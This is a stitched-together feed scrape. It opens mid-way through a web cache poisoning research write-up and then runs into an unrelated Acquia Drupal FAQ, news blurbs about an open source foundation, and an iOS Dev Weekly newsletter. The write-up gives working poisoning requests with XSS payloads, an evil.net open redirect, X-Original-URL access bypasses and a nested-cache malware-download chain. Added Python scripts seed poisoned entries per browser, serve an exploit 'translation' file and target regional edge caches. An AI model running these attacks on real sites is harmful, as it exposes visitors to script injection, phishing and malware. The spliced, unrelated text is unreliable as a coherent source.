X-Forwarded-Host: a"><iframe onload=alert(1)>HTTP/1.1 200 OK
X-Served-By: cache-lhr6335-LHR
Vary: User-Agent, Accept-Encoding

<link rel="canonical" href="https://a">a<iframe onload=alert(1)>
</iframe>

This initially looks almost identical to the first example. However, the Vary header tells us that our User-Agent may be part of the cache key, and manual testing confirms this. This means that because we've claimed to be using Firefox 60, our exploit will only be served to other Firefox 60 users. We could use a list of popular user agents to ensure most visitors receive our exploit, but this behaviour has given us the option of more selective attacks. Provided you knew their user agent, you could potentially tailor the attack to target a specific person, or even conceal itself from the website monitoring team.
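
Because each User-Agent string gets its own cache entry here, seeding one poisoned copy per browser is just a loop; the user-agent strings and request helper below are placeholders:

POPULAR_USER_AGENTS = [
    "Mozilla/5.0 ... Firefox/60.0",   # use a real top-N user-agent list
    "Mozilla/5.0 ... Chrome/67.0",
]

def poison_per_user_agent(send_poisoned_request, user_agents=POPULAR_USER_AGENTS):
    for ua in user_agents:
        # One poisoned cache entry per UA; a single known UA instead gives
        # a targeted, low-noise attack against one victim.
        send_poisoned_request({
            "User-Agent": ua,
            "X-Forwarded-Host": 'a"><iframe onload=alert(1)>',
        })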

DOM Poisoning

Exploiting an unkeyed input isn't always as easy as pasting an XSS payload. Take the following request:

GET /dataset HTTP/1.1
Host: catalog.data.gov
X-Forwarded-Host: canary

HTTP/1.1 200 OK
Age: 32707
X-Cache: Hit from cloudfront

<body data-site-root="https://canary/">

We've got control of the 'data-site-root' attribute, but we can't break out to get XSS and it's not clear what this attribute is even used for. To find out, I created a match and replace rule in Burp to add an 'X-Forwarded-Host: id.burpcollaborator.net' header to all requests, then browsed the site. When certain pages loaded, Firefox sent a JavaScript-generated request to my server:

GET /api/i18n/en HTTP/1.1
Host: id.burpcollaborator.net

The path suggests that somewhere on the website, there's JavaScript code using the data-site-root attribute to decide where to load some internationalisation data from. I attempted to find out what this data ought to look like by fetching https://catalog.data.gov/api/i18n/en, but merely received an empty JSON response. Fortunately, changing 'en' to 'es' gave a clue:

GET /api/i18n/es HTTP/1.1
Host: catalog.data.gov

HTTP/1.1 200 OK

{"Show more":"Mostrar más"}

The file contains a map for translating phrases into the user's selected language. By creating our own translation file and using cache poisoning to point users toward that, we could translate phrases into exploits:

GET /api/i18n/en HTTP/1.1
Host: portswigger-labs.net

HTTP/1.1 200 OK
...
{"Show more":"<svg onload=alert(1)>"}

The end result? Anyone who viewed a page containing the text 'Show more' would get exploited.
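
Completing the attack requires a server at the poisoned data-site-root that answers the /api/i18n/en fetch; a minimal sketch (the route and payload mirror the example above, the rest is assumption):

from http.server import BaseHTTPRequestHandler, HTTPServer

class TranslationHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path.startswith("/api/i18n/"):
            body = b'{"Show more":"<svg onload=alert(1)>"}'   # exploit as a 'translation'
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.send_header("Access-Control-Allow-Origin", "*")  # permit the cross-origin fetch
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_error(404)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), TranslationHandler).serve_forever()  # binding port 80 needs privileges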

Hijacking Mozilla SHIELD

The 'X-Forwarded-Host' match/replace rule I configured to help with the last vulnerability had an unexpected side effect. In addition to the interactions from catalog.data.gov, I received some that were distinctly mysterious:

GET /api/v1/recipe/signed/ HTTP/1.1
Host: xyz.burpcollaborator.net
User-Agent: Mozilla/5.0 … Firefox/57.0
Accept: application/json
origin: null
X-Forwarded-Host: xyz.burpcollaborator.net

The 'null' origin is quite rare by itself and I'd never seen a browser issue a fully lowercase Origin header before. Sifting through proxy history logs revealed that the culprit was Firefox itself. Firefox had tried to fetch a list of 'recipes' as part of its SHIELD system for silently installing extensions for marketing and research purposes. This system is probably best known for forcibly distributing a 'Mr Robot' extension, causing considerable consumer backlash.

Anyway, it looked like the X-Forwarded-Host header had fooled this system into directing Firefox to my own website in order to fetch recipes:

GET /api/v1/ HTTP/1.1
Host: normandy.cdn.mozilla.net
X-Forwarded-Host: xyz.burpcollaborator.net

HTTP/1.1 200 OK
{
  "action-list": "https://xyz.burpcollaborator.net/api/v1/action/",
  "action-signed": "https://xyz.burpcollaborator.net/api/v1/action/signed/",
  "recipe-list": "https://xyz.burpcollaborator.net/api/v1/recipe/",
  "recipe-signed": "https://xyz.burpcollaborator.net/api/v1/recipe/signed/",
  …
}

Recipes look something like:

[{
  "id": 403,
  "last_updated": "2017-12-15T02:05:13.006390Z",
  "name": "Looking Glass (take 2)",
  "action": "opt-out-study",
  "addonUrl": "https://normandy.amazonaws.com/ext/pug.mrrobotshield1.0.4-signed.xpi",
  "filter_expression": "normandy.country in  ['US', 'CA']\n && normandy.version >= '57.0'\n)",
  "description": "MY REALITY IS JUST DIFFERENT THAN YOURS",
}]

This system was using NGINX for caching, which was naturally happy to save my poisoned response and serve it to other users. Firefox fetches this URL shortly after the browser is opened and also periodically refetches it, ultimately meaning all of Firefox's tens of millions of daily users could end up retrieving recipes from my website.

This offered quite a few possibilities. The recipes used by Firefox were signed so I couldn't just install a malicious addon and get full code execution, but I could direct tens of millions of genuine users to a URL of my choice. Aside from the obvious DDoS usage, this would be extremely serious if combined with an appropriate memory corruption vulnerability. Also, some backend Mozilla systems use unsigned recipes, which could potentially be used to obtain a foothold deep inside their infrastructure and perhaps obtain the recipe-signing key. Furthermore, I could replay old recipes of my choice which could potentially force mass installation of an old known-vulnerable extension, or the unexpected return of Mr Robot.

I reported this to Mozilla and they patched their infrastructure in under 24 hours but there was some disagreement about the severity so it was only rewarded with a $1,000 bounty.

Route poisoning

Some applications go beyond foolishly using headers to generate URLs, and foolishly use them for internal request routing:

GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Server: canary

HTTP/1.1 404 Not Found
CF-Cache-Status: MISS

<title>HubSpot - Page not found</title>
<p>The domain canary does not exist in our system.</p>

Goodhire.com is evidently hosted on HubSpot, and HubSpot is giving the X-Forwarded-Server header priority over the Host header and getting confused about which client this request is intended for. Although our input is reflected in the page, it's HTML encoded so a straightforward XSS attack doesn't work here. To exploit this, we need to go to hubspot.com, register ourselves as a HubSpot client, place a payload on our HubSpot page, and then finally trick HubSpot into serving this response on goodhire.com:

GET / HTTP/1.1
Host: www.goodhire.com
X-Forwarded-Host: portswigger-labs-4223616.hs-sites.com

HTTP/1.1 200 OK

<script>alert(document.domain)</script>

Cloudflare happily cached this response and served it to subsequent visitors. Inflection passed this report on to HubSpot, who resolved the issue by permanently banning my IP address. After some encouragement they also patched the vulnerability.

Internal misrouting vulnerabilities like this are on particularly common on SaaS applications where there's a single system handling requests intended for many different customers.

Hidden Route Poisoning

Route poisoning vulnerabilities aren't always quite so obvious:

GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: canary

HTTP/1.1 302 Found
Location: https://ghost.org/fail/

Cloudflare's blog is hosted by Ghost, who are clearly doing something with the X-Forwarded-Host header. You can avoid the 'fail' redirect by specifying another recognized hostname like blog.binary.com, but this simply results in a mysterious 10 second delay followed by the standard blog.cloudflare.com response. At first glance there's no clear way to exploit this.

When a user first registers a blog with Ghost, it issues them with a unique subdomain under ghost.io. Once a blog is up and running, the user can define an arbitrary custom domain like blog.cloudflare.com. If a user has defined a custom domain, their ghost.io subdomain will simply redirect to it:

GET / HTTP/1.1
Host: noshandnibble.ghost.io

HTTP/1.1 302 Found
Location: http://noshandnibble.blog/

Crucially, this redirect can also be triggered using the X-Forwarded-Host header:

GET / HTTP/1.1
Host: blog.cloudflare.com
X-Forwarded-Host: noshandnibble.ghost.io

HTTP/1.1 302 Found
Location: http://noshandnibble.blog/

By registering my own ghost.org account and setting up a custom domain, I could redirect requests sent to blog.cloudflare.com to my own site: waf.party. This meant I could hijack resource loads like images:

[Screenshot: an image on blog.cloudflare.com served from the attacker-controlled waf.party]

The next logical step of redirecting a JavaScript load to gain full control over blog.cloudflare.com was thwarted by a quirk – if you look closely at the redirect, you'll see it uses HTTP whereas the blog is loaded over HTTPS. This means that browsers' mixed-content protections kick in and block script/stylesheet redirections.

I couldn't find any technical way to make Ghost issue a HTTPS redirect, and was tempted to abandon my scruples and report the use of HTTP rather than HTTPS to Ghost as a vulnerability in the hope that they'd fix it for me. Eventually I decided to crowdsource a solution by making a replica of the problem and placing it in hackxor with a cash prize attached. The first solution was found by Sajjad Hashemian, who spotted that in Safari if waf.party was in the browser's HSTS cache the redirect would be automatically upgraded to HTTPS rather than being blocked. Sam Thomas followed up with a solution for Edge, based on work by Manuel Caballero – issuing a 302 redirect to a HTTPS URL completely bypasses Edge's mixed-content protection.

In total, against Safari and Edge users I could completely compromise every page on blog.cloudflare.com, blog.binary.com, and every other ghost.org client. Against Chrome/Firefox users, I could merely hijack images. Although I used Cloudflare for the screenshot above, as this was an issue in a third party system I chose to report it via Binary because their bug bounty program pays cash, unlike Cloudflare's.

Chaining Unkeyed Inputs

Sometimes an unkeyed input will only confuse part of the application stack, and you'll need to chain in other unkeyed inputs to achieve an exploitable result. Take the following site:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: xyz

HTTP/1.1 200 OK
Set-Cookie: locale=en; domain=xyz

The X-Forwarded-Host header overrides the domain on the cookie, but none of the URLs generated in the rest of the response. By itself this is useless. However, there's another unkeyed input:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Scheme: nothttps

HTTP/1.1 301 Moved Permanently
Location: https://redacted.net/en

This input is also useless by itself, but if we combine the two together we can convert the response into a redirect to an arbitrary domain:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com
X-Forwarded-Scheme: nothttps

HTTP/1.1 301 Moved Permanently
Location: https://attacker.com/en

Using this technique it was possible to steal CSRF tokens from a custom HTTP header by redirecting a POST request. I could also obtain stored DOM-based XSS with a malicious response to a JSON load, similar to the data.gov exploit mentioned earlier.
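
Scripted, the chained probe is simply two headers on one request. This is a sketch against a hypothetical host, with a cache buster added so the test stays out of real visitors' cache entries:

import uuid
import requests

resp = requests.get(
    "https://www.example.com/en",
    params={"cachebuster": uuid.uuid4().hex},
    headers={
        "X-Forwarded-Host": "attacker.example",
        # Any value other than the real scheme triggers the upgrade redirect.
        "X-Forwarded-Scheme": "nothttps",
    },
    allow_redirects=False,  # inspect the 301 itself rather than following it
    timeout=10,
)
print(resp.status_code, resp.headers.get("Location"))
# If vulnerable: 301 https://attacker.example/en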

Open Graph Hijacking

On another site, the unkeyed input exclusively affected Open Graph URLs:

GET /en HTTP/1.1
Host: redacted.net
X-Forwarded-Host: attacker.com

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate

<meta property="og:url" content='https://attacker.com/en'/>

Open Graph is a protocol created by Facebook to let website owners dictate what happens when their content is shared on social media. The og:url parameter we've hijacked here effectively overrides the URL that gets shared, so anyone who shares the poisoned page actually ends up sharing content of our choice.

As you may have noticed, the application sets 'Cache-Control: private', and Cloudflare refuse to cache such responses. Fortunately, other pages on the site explicitly enable caching:

GET /popularPage HTTP/1.1
Host: redacted.net
X-Forwarded-Host: evil.com

HTTP/1.1 200 OK
Cache-Control: public, max-age=14400
Set-Cookie: session_id=942…
CF-Cache-Status: MISS

The 'CF-Cache-Status' header here is an indicator that Cloudflare is considering caching this response, but in spite of this the response was never actually cached. I speculated that Cloudflare's refusal to cache this might be related to the session_id cookie, and retried with that cookie present:

GET /popularPage HTTP/1.1
Host: redacted.net
Cookie: session_id=942…;
X-Forwarded-Host: attacker.com

HTTP/1.1 200 OK
Cache-Control: public, max-age=14400
CF-Cache-Status: HIT

<meta property="og:url"
content='https://attacker.com/…

This finally got the response cached, although it later turned out that I could have skipped the guesswork and read Cloudflare's cache documentation instead.

In spite of the response being cached, the 'Share' result still remained unpoisoned; Facebook evidently wasn't hitting the particular Cloudflare cache that I'd poisoned. To identify which cache I needed to poison, I took advantage of a helpful debugging feature present on all Cloudflare sites - /cdn-cgi/trace:

[image: /cdn-cgi/trace output showing colo=AMS]

Here, the colo=AMS line shows that Facebook has accessed waf.party through a cache in Amsterdam. The target website was accessed via Atlanta, so I rented a $2/month VPS there and attempted the poisoning again:

[image: the poisoning attempt repeated through the Atlanta cache]

After this, anyone who attempted to share various pages on their site would end up sharing content of my choice. Here's a heavily redacted video of the attack:

[video]

Local Route Poisoning

So far we've seen a cookie-based language hijack, and a plague of attacks that use various headers to override the host. At this point in the research I had also found a few variations using bizarre non-standard headers such as 'translate', 'bucket' and 'path_info', and suspected I was missing many others. My next major advancement came after I expanded the header wordlist by downloading and scouring the top 20,000 PHP projects on GitHub for header names.

This revealed the headers X-Original-URL and X-Rewrite-URL which override the request's path. I first noticed them affecting targets running Drupal, and digging through Drupal's code revealed that the support for this header comes from the popular PHP framework Symfony, which in turn took the code from Zend. The end result is that a huge number of PHP applications unwittingly support these headers. Before we try using these headers for cache poisoning, I should point out they're also great for bypassing WAFs and security rules:

GET /admin HTTP/1.1
Host: unity.com

HTTP/1.1 403 Forbidden
...
Access is denied

GET /anything HTTP/1.1
Host: unity.com
X-Original-URL: /admin

HTTP/1.1 200 OK
...
Please log in
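
Checking whether a target honours these overrides takes one request pair. A minimal sketch (the target and paths here are placeholders, not the original report):

import requests

TARGET = "https://www.example.com"

blocked = requests.get(TARGET + "/admin", timeout=10)
bypassed = requests.get(
    TARGET + "/anything",
    headers={"X-Original-URL": "/admin"},  # ask the framework to re-route internally
    timeout=10,
)
# If the second response looks like the admin page while the first is a 403,
# the header is honoured and any front-end path rule has been sidestepped.
print(blocked.status_code, bypassed.status_code)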

If an application uses a cache, these headers can be abused to confuse it into serving up incorrect pages. For example, this request has a cache key of /education?x=y but retrieves content from /gambling?x=y:

[image: a request with cache key /education?x=y fetching content from /gambling?x=y]

The end result is that after sending this request, anyone who tries to access the Unity for education page gets a surprise:

[image: the Unity for education page serving the gambling page's content]

The ability to swap around pages is more amusing than serious, but perhaps it has a place in a bigger exploit chain.

Internal Cache Poisoning

Drupal is often used with third party caches like Varnish, but it also contains an internal cache which is enabled by default. This cache is aware of the X-Original-URL header and includes it in its cache key, but makes the mistake of also including the query string from this header:

[image: Drupal's internal cache including the X-Original-URL query string in its cache key]

While the previous attack let us replace a path with another path, this one lets us override the query string:

GET /search/node?keys=kittens HTTP/1.1

HTTP/1.1 200 OK

Search results for 'snuff'
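
The request shown above doesn't spell out the header it was sent with, so treat the following as an assumption: here is how the query-string override would look scripted, with X-Original-URL carrying the attacker's query string.

import requests

# Fetch the 'kittens' search page while telling Drupal the request was really
# for ?keys=snuff. Because the internal cache mishandles the query string taken
# from X-Original-URL, the 'snuff' results end up cached for the kittens page.
requests.get(
    "https://www.example.com/search/node",
    params={"keys": "kittens"},
    headers={"X-Original-URL": "/search/node?keys=snuff"},
    timeout=10,
)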

This is more promising, but it's still quite limited – we need a third ingredient.

Drupal Open Redirect

While reading Drupal's URL-override code, I noticed an extremely risky feature – on all redirect responses, you can override the redirect target using the 'destination' query parameter. Drupal attempts some URL parsing to ensure it won't redirect to an external domain, but this is predictably easy to bypass:

GET //?destination=https://evil.net\@unity.com/ HTTP/1.1
Host: unity.com

HTTP/1.1 302 Found
Location: https://evil.net\@unity.com/

Drupal sees the double-slash // in the path and tries to issue a redirect to / to normalize it, but then the destination parameter kicks in. Drupal thinks the destination URL is telling people to access unity.com with the username 'evil.net\' but in practice web browsers automatically convert the \ to /, landing users on evil.net/@unity.com.
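
The parser disagreement that makes this bypass work is easy to reproduce with Python's standard library: a strict URL parser treats everything before the @ as credentials, while browsers first rewrite the backslash as a forward slash. A quick illustration (not Drupal's actual validation code):

from urllib.parse import urlsplit

url = "https://evil.net\\@unity.com/"

# A server-side parser sees unity.com as the host, with 'evil.net\' as a username.
parts = urlsplit(url)
print(parts.hostname)  # unity.com
print(parts.username)  # evil.net\

# A browser normalises '\' to '/' before parsing, so the same string becomes
# https://evil.net/@unity.com/ and the host is evil.net.
print(urlsplit(url.replace("\\", "/")).hostname)  # evil.net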

Once again, by itself an open redirect is hardly exciting, but now we finally have all the building blocks for a serious exploit.

Persistent redirect hijacking

We can combine the parameter override attack with the open redirect to persistently hijack any redirect. Certain pages on Pinterest's business website happen to import JavaScript via a redirect. The following request poisons the cache entry shown in blue with the parameter shown in orange:

GET /?destination=https://evil.net\@business.pinterest.com/ HTTP/1.1
Host: business.pinterest.com
X-Original-URL: /foo.js?v=1

This hijacks the destination of the JavaScript import, giving me full control of several pages on business.pinterest.com that are supposed to be static:

GET /foo.js?v=1 HTTP/1.1

HTTP/1.1 302 Found
Location: https://evil.net\@business.pinterest.com/

Nested cache poisoning

Other Drupal sites are less obliging, and don't import any important resources via redirects. Fortunately, if the site uses an external cache (like virtually all high-traffic Drupal sites) we can use the internal cache to poison the external cache, and in the process convert any response into a redirection. This is a two-stage attack. First, we poison the internal cache to replace /redir with our malicious redirect:

GET /?destination=https://evil.net\@store.unity.com/ HTTP/1.1
Host: store.unity.com
X-Original-URL: /redir

Next, we poison the external cache to replace /download?v=1 with our pre-poisoned /redir:

GET /download?v=1 HTTP/1.1
Host: store.unity.com
X-Original-URL: /redir

The end result is that clicking 'Download installer' on unity.com would download some opportunistic malware from evil.net. This technique could also be used for a wealth of other attacks including inserting spoofed entries into RSS feeds, replacing login pages with phishing pages, and stored XSS via dynamic script imports.
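
The two-stage attack is easy to script; ordering matters, because the internal cache entry for /redir has to be poisoned before the external cache takes its snapshot. A sketch with placeholder hostnames:

import requests

HOST = "https://store.example.com"
REDIRECT = "https://evil.example\\@store.example.com/"

# Stage 1: seed Drupal's internal cache so /redir now points at our open redirect.
requests.get(
    HOST + "/?destination=" + REDIRECT,
    headers={"X-Original-URL": "/redir"},
    allow_redirects=False,
    timeout=10,
)

# Stage 2: get the external cache to store the pre-poisoned /redir
# as the response for the download endpoint.
requests.get(
    HOST + "/download?v=1",
    headers={"X-Original-URL": "/redir"},
    allow_redirects=False,
    timeout=10,
)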

Here's a video of one such attack on a stock Drupal installation:

[video]

This vulnerability was disclosed to the Drupal, Symfony and Zend teams on 2018-05-29 and support for these headers has hopefully been disabled via a coordinated patch release by the time you read this.

Cross-Cloud Poisoning

As you could probably have guessed, some of these vulnerability reports triggered interesting reactions and responses.

One triager, scoring my submission using CVSS, gave a CloudFront cache poisoning report an access complexity of 'high' because an attacker might need to rent several VPSs in order to poison all CloudFront's caches. Resisting the temptation to argue about what constitutes 'high' complexity, I took this as an opportunity to explore whether cross-region attacks are possible without relying on VPSs.

It turned out that CloudFront have a helpful map of their caches, and their IP addresses can be easily identified using free online services that issue DNS lookups from a range of geographical locations. Poisoning a specific region from the comfort of your bedroom is as simple as routing your attack to one of these IPs using curl/Burp's host-name override features.
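
Targeting one regional cache from anywhere then boils down to connecting to that edge's IP directly while supplying the victim's Host header. A sketch over plain HTTP (the edge IP is a placeholder):

import requests

EDGE_IP = "203.0.113.7"        # an edge node in the region you want to poison
VICTIM_HOST = "www.example.com"

resp = requests.get(
    "http://" + EDGE_IP + "/",
    headers={"Host": VICTIM_HOST, "X-Forwarded-Host": "attacker.example"},
    timeout=10,
)
# CF-Cache-Status (or X-Cache on CloudFront) confirms which cache handled it.
print(resp.status_code, resp.headers.get("CF-Cache-Status"))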

As Cloudflare have even more regional caches, I decided to take a look at them too. Cloudflare publish a list of all their IP addresses online, so I wrote a quick script to request waf.party/cdn-cgi/trace through each of these IPs and record which cache I hit:

curl https://www.cloudflare.com/ips-v4 | sudo zmap -p80 | zgrab --port 80 --data traceReq | fgrep visit_scheme | jq -c '[.ip , .data.read]' cf80scheme | sed -E 's/\["([0-9.]*)".*colo=([A-Z]+).*/\1 \2/' | awk -F " " '!x[$2]++'

This showed that when targeting waf.party (which is hosted in Ireland) I could hit the following caches from my home in Manchester:

104.28.19.112 LHR    172.64.13.163 EWR    198.41.212.78 AMS
172.64.47.124 DME    172.64.32.99 SIN    108.162.253.199 MSP
172.64.9.230 IAD    198.41.238.27 AKL    162.158.145.197 YVR

Defense

The most robust defense against cache poisoning is to disable caching. This is plainly unrealistic advice for some, but I suspect that quite a few websites start using a service like Cloudflare for DDoS protection or easy SSL, and end up vulnerable to cache poisoning simply because caching is enabled by default.

Restricting caching to purely static responses is also effective, provided you're sufficiently wary about what you define as 'static'.

Likewise, avoiding taking input from headers and cookies is an effective way to prevent cache poisoning, but it's hard to know if other layers and frameworks are sneaking in support for extra headers. As such I recommend auditing every page of your application with Param Miner to flush out unkeyed inputs.

Once you've identified unkeyed inputs in your application, the ideal solution is to outright disable them. Failing that, you could strip the inputs at the cache layer, or add them to the cache key. Some caches let you use the Vary header to key unkeyed inputs, and others let you define custom cache keys but may restrict this feature to 'enterprise' customers.
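
Where the cache itself can't be reconfigured, stripping the offending inputs before the application sees them is a workable fallback. A minimal WSGI middleware sketch; the header list is illustrative and should come from auditing your own stack:

# Headers arrive in WSGI environ as HTTP_* keys.
UNKEYED_HEADERS = (
    "HTTP_X_FORWARDED_HOST",
    "HTTP_X_FORWARDED_SCHEME",
    "HTTP_X_ORIGINAL_URL",
    "HTTP_X_REWRITE_URL",
)

class StripUnkeyedInputs:
    """Drop unkeyed request headers before the framework can act on them."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        for key in UNKEYED_HEADERS:
            environ.pop(key, None)
        return self.app(environ, start_response)

# Usage: wrap your WSGI app, e.g. application = StripUnkeyedInputs(application)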

Finally, regardless of whether your application has a cache, some of your clients may have a cache at their end and as such client-side vulnerabilities like XSS in HTTP headers should never be ignored.

Conclusion

Web cache poisoning is far from a theoretical vulnerability, and bloated applications and towering server stacks are conspiring to take it to the masses. We've seen that even well-known frameworks can hide dangerous omnipresent features, confirming it's never safe to assume that someone else has read the source code just because it's open-source and has millions of users. We've also seen how placing a cache in front of a website can take it from completely secure to critically vulnerable. I think this is part of a greater trend where as websites become increasingly nestled inside helper systems, their security posture is increasingly difficult to adequately assess in isolation.

Finally, I've built a little challenge for people to test their knowledge, and look forward to seeing where other researchers take web cache poisoning in future.


          Acquia Cloud, Site Factory, Drupal FAQ      Cache   Translate Page   Web Page Cache   
Acquia Cloud, Site Factory, Drupal FAQ

Have you ever looked through Acquia’s website and thought “Hmmmm … what does that mean exactly?” If you answered yes, then this post is for you. We’ve heard your questions and we’re answering them in plain English for you.

What is the difference between Acquia Cloud and Acquia Cloud Site Factory?


Acquia Cloud is a platform that manages Drupal applications. Site Factory adds the ability to manage multisite Drupal applications. "Multisite" is a specific configuration that enables a single Drupal application to support multiple websites. When one application supports just one website – as is the case for most Acquia Cloud customers – technical and business processes are relatively streamlined.

Applying a security patch to your Drupal application, for example, only impacts one website. Giving your site administrator rights to the Drupal website just means adding credentials in one place.

Imagine if one Drupal application supported 50 websites. Applying the security patch will impact 50 websites. Adding admin users to 50 websites becomes a cumbersome task. Now imagine that same scenario across 5000 websites. Acquia Cloud Site Factory provides tools that make managing that complexity easier for both technical and business users.

One of the big differences between Acquia Cloud and Acquia Cloud Site Factory is that Acquia Cloud is intended to be used by technical teams such as developers and devops engineers, whereas Acquia Cloud Site Factory offers features for both technical and non-technical users such as marketers.

Most notably, Acquia Cloud Site Factory gives marketers the ability to create sites from their Drupal application with just a few clicks – no development expertise needed. In addition to this no-code site creation capability, organizations look to Acquia Cloud Site Factory when they want to scale to hundreds or thousands of sites in a short amount of time.

This isn’t to say that Acquia Cloud isn’t for organizations looking to scale their digital presence; we’re simply saying that Site Factory is best for digital experiences at a mass scale.  


What do I get with managed service?

When we talk about managed services we are talking about a cloud platform where we have already orchestrated all of the parts of the cloud for you. We operate the cloud so you don’t have to. So what exactly are you getting with managed services? The short answer is a platform that is orchestrated, automated and operated for you so all you have to do is start building your applications.

Why do I need Acquia to host Drupal?

You don’t need Acquia to host Drupal per se; anyone can do that. However, Acquia provides the support, security and scale so you can build faster. That translates to less for your IT teams to manage than they would with a DIY approach, more robust than hosting since it’s a PaaS, and it’s more cost effective than other proprietary vendors because we don’t charge a licensing fee. Basically, you get the beauty of open source but with all the support and security bells and whistles.

We’ll be back in a few weeks with a whole new set of questions. Is there something you need to know right this very second (OK, probably not that quickly, but you get the point)? Hit us up on Twitter at @acquia. Otherwise, stay tuned.

Reena Leone

Senior Manager, Content Marketing Acquia

Reena Leone has nearly 10 years of digital marketing experience, working for both digital agencies and global brands.

A self-described “writer, podcaster, cosplayer, and nerd,” she said her favorite aspect of working at Acquia is her collaboration with colleagues.

“When we say ‘#ilovemyteam,’ it's not a joke. This is the kind of place where you can be you; individuality is encouraged,” Leone said.

Since she started at Acquia, Leone has had the opportunity to forge her own career path, she said.

“This flexibility has made me more capable of handling any challenge thrown my way, and allowed me to grow my skills as a writer, editor, and manager.”

You Ask, We Answer: Acquia Cloud, Site Factory and Drupal

          Hollywood gets its own open source foundation      Cache   Translate Page   Web Page Cache   
Open source is everywhere now, so maybe it’s no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) today announced that it has partnered with the Linux Foundation to launch the Academy Software Foundation, a new open source foundation for developers in the motion picture and media space. […]
          The Academy teams up with Linux Foundation for open source tech      Cache   Translate Page   Web Page Cache   
The Academy for Motion Picture Arts and Sciences (AMPAS), best known for running the Oscars, is diving into the technology world in a surprisingly new way. Together with the Linux Foundation, it's launching the Academy Software Foundation (ASWF), a n...
          iOS Dev Weekly - Issue 364 - Aug 10th 2018      Cache   Translate Page   Web Page Cache   

Comment

Last week I talked about a recent controversy with apps that used VPN APIs for things that they were not intended for. This week brought with it more hiccups after a change in policy around gambling apps caused quite a few removals from the store. To sum it up, apps that involve gambling of any kind (either real or simulated) must now be on the App Store account of a corporate entity rather than an individual.

I think the change itself is probably reasonable given the regulations and liabilities around gambling. It's also a good sign that Apple are continuously looking at the rules of the App Store and tweaking them where it makes sense. What I think could be handled so much better though, as with many things that Apple does, is the communication around the changes. It appears that the review guidelines are not yet updated with the new policy and the method of communication to affected developers seems to have been an email which arrived after their apps had been removed from the store.

I haven't mentioned yet that the removal process in this instance also seemed to be a bit over zealous with several false positives being reported. I don't think this is worth talking much about as it seems to be a mistake which is getting quickly corrected. However that would have been so much simpler to determine if the change had been communicated clearly.

The ironic thing is that better communication would benefit Apple as much as it would us developers. Instead of Twitter and blogs exploding with overreactions to every change, Apple could get out in front of the conversation and quash the controversies before they explode. At the very least, the App Store guidelines must start getting updated to accompany policy changes, but I think a news post or similar before they happen would also be a great step forward.

Dave Verwer

News

Approximately ⅓ of all App Store submissions get rejected

The real number is much, much lower of course as many apps will be rejected for issues during review only to then be allowed through once they are resolved. Even so, that's a much higher percentage than I would have guessed at!

twitter.com

Sponsored Link

Find An iOS Dev Job Through Vettery

Vettery specializes in developer roles and is completely free for job seekers. Interested? Submit your profile, and if accepted onto the platform, you can receive interview requests directly from top companies growing their mobile dev teams. Get Started.

vettery.com

Tools

xiblint

SwiftLint is a fantastic tool for keeping your code standards in check, but what about Storyboards and XIBs? With checks for accessibility labels, ambiguous/misplaced views and a font check to make sure there's no rogue fonts hiding in a storyboard, I really like this.

When I saw this it felt familiar and I thought I had linked to it before, but searching the archives tells me I hadn't! Thanks to Jonathan Wight for reminding me of it! Too many links...

github.com

knil

Universal links are cool, but testing them can be hard. Luckily Ethan Huang is here to make it easy! 😀 This tool downloads your association file and allows you to test it as well as providing shortcuts to the Apple and Branch validation tools.

github.com

xcode-install

I saw this tweet by Felix Krause this week and it seemed like a good idea to remind everyone that during this period of almost weekly new Xcode releases, you don't need to go to the Xcode downloads page every time!

github.com

Code

Unwrap

I've been following Paul Hudson's tweets about his new app for teaching Swift using his Swift in 60 seconds content. Yesterday saw him release the code to GitHub. This isn't just a release of the content (although that is included), but a release of the app itself, including all of the quiz functionality for you to look through and learn from.

Just note that this code is not open source, yet!

twitter.com

Building Fluid Interfaces

I agree with Nathan Gitter that the Designing Fluid Interfaces presentation from WWDC this year was outstanding. It was focused on concepts and design rather than implementation though. What if someone had put together the examples used in the talk into a project that was available on GitHub? Thanks Nathan!

medium.com

ScrollingStackViewController

After talking about stack views inside scroll views last week, Maciej Trybiło was kind enough to let me know about ScrollingStackViewController which packages the same technique up into a library. Just subclass ScrollingStackViewController and add your child view controllers. 👍

github.com

Refactoring Massive App Delegate

I feel like the days of truly massive application delegates are thankfully behind us, but that doesn't mean you won't find them becoming a bit of a dumping ground if not watched carefully. We'll all be familiar with that code that started as "Oh this is just one line of code in didFinishLaunching" but ultimately grew to become much bigger. Vadim Bulavin has some techniques to help you keep it under control.

vadimbulavin.com

The Case for CloudKit

Firebase seems to be taking over the world a bit, but before you commit to it for your next project read Andrew Bancroft's case for CloudKit. I still think if you're building something truly serious then rolling your own back end is probably the way to go, but I do like CloudKit too.

andrewcbancroft.com

Books

Server Side Swift with Vapor

Server side Swift certainly hasn't gone mainstream yet, but with Vapor hitting 3.0 recently it might be something you've thought about learning. If that's the case then this book looks to be a great way to get up to speed. Just a note for full disclosure, I asked for a review copy of this book as it looked interesting and was provided with one.

Oh and congratulations to Ray and the team on the new site design. It's certainly come a long way from the early days!

raywenderlich.com

Jobs

Swift Developer WillowTree Charlottesville VA

Get paid to build cool stuff. Competitive pay. Exciting projects. Great people.

jobvite.com

iOS Developer at Savvy Apps (Remote)

Come build world-class apps at Savvy. Proudly remote since 2009.

savvyapps.com

Build iOS for Agriculture at Granular, San Francisco

Join a small team digitizing farms around the globe using the latest mobile technologies!

grnh.se

And finally...

They've gathered enough data on stop signs and storefronts...

The stage after this is to make us play a game where we drive a car down a highway for 10 seconds to complete the CAPTCHA. That's the secret of how we'll get self driving cars. 🚖

twitter.com


This RSS feed is published on https://iosdevweekly.com/. You can also subscribe via email or Safari push notifications.


          PHP, Open Source, Node. JS Application, CMS, Odoo Development Company in USA. | Agile Infoways      Cache   Translate Page   Web Page Cache   
